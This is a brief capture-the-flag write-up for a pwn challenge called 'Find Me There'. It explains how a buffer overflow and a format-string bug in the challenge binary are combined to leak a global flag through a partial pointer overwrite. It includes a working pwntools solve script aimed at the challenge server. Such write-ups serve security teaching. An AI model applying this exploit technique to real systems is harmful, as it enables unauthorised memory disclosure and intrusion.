# [EN] Find Me There
###### tags: `Writeup` `Pwn` `English`
> [name=Curious]
## Train of Thought & Solution
From `chal.c`, we can see that this problem has a BOF in `read(0, buf, 0x40)`, and there is a FMT in `printf(buf)`. Additionally, `flag` is a global variable, meaning it shares the same base address as `main`.
We know that there will be some useful addresses left on the stack at runtime, and when this binary is executed:
If we use `objdump -t chal` to check the offset of `flag` and `main`, we get:
Furthermore, the problem provides the last two bytes of the `main` address. So, all we need to do is to use BOF to overwrite the last two bytes of the `main` address with those of `flag`, and then use FMT to print out the `flag`."
Solve Script :
```python=
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
# r = process('./chal')
r = remote('lotuxctf.com', 10008)
main_addr_partial = int(r.recvline().strip().split(b': ')[1])
flag_addr_partial = main_addr_partial - 0x00000000000011a9 + 0x0000000000004010
r.send(b'%13$s\x00'.ljust(0x38, b'a') + bytes([flag_addr_partial & 0xff, (flag_addr_partial >> 8) & 0xff]))
r.interactive()
```
{%hackmd M1bgOPoiQbmM0JRHWaYA1g %}
Sign in with Wallet
Connect another wallet